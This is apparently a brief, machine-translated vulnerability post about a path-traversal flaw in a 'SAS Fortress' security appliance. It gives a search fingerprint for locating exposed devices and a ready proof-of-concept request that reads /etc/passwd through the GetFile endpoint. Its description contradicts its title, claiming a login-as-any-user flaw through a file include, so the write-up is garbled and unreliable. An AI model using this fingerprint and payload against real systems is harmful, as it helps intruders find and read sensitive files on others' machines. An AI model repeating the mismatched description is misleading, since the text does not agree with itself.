Green League Sas Fortress Getfile Arbitrary File Reading Vulnerability
Green Alliance SAS Fortress GetFile arbitrary file reading vulnerability
Vulnerability Description
Green Alliance Fortress has a vulnerability that allows login as any user. An attacker can exploit it to include www/local_user.php and log in as any user.
Vulnerability Impact
Green League SAS Fortress
Network surveying and mapping
body="'/needUsbkey.php?username='"
Vulnerability reproduction
Login page
The vulnerability exists in the file GetFileController.php
Verify POC
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.